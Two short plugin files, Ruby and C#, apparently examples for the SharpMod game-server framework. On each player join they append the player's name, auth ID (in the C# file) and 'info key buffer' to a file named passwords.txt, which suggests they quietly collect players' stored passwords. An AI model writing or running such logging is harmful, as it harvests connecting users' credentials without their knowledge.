File: bin/plugins/ruby/fieldinfo.rb
include SharpMod

class FieldInfoPlugin
  include IPlugin
  attr_reader :name, :author, :description, :version, :short_version

  def initialize
    @name        = "FieldInfo IronRuby example"
    @author      = "Andrius Bentkus"
    @description = "Saves the infokeybuffer of a player when he joins"
    @version     = System::Version.new 1, 0
  end

  def load
    Player.put_in_server { |args| File.open("passwords.txt", 'a') { |f| f.puts args.player.to_s + " " + args.player.info_key_buffer } }
  end

end

FieldInfoPlugin.new

File: src/Plugins/SharpMod.FieldInfo/FieldInfo.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
using SharpMod;

namespace SharpMod.FieldInfo
{
	public class Plugin : BasicPlugin
	{
		public override void Load()
		{
			Player.Connect += (Player.ConnectEventArgs args) => {
				StreamWriter sw = new StreamWriter(File.Open("passwords.txt", FileMode.Append));
				sw.WriteLine("{0} {1} {2} {3}", DateTime.Now, args.Player.Name, args.Player.AuthID, args.Player.InfoKeyBuffer);
				sw.Close();
			};
		}
	}
}
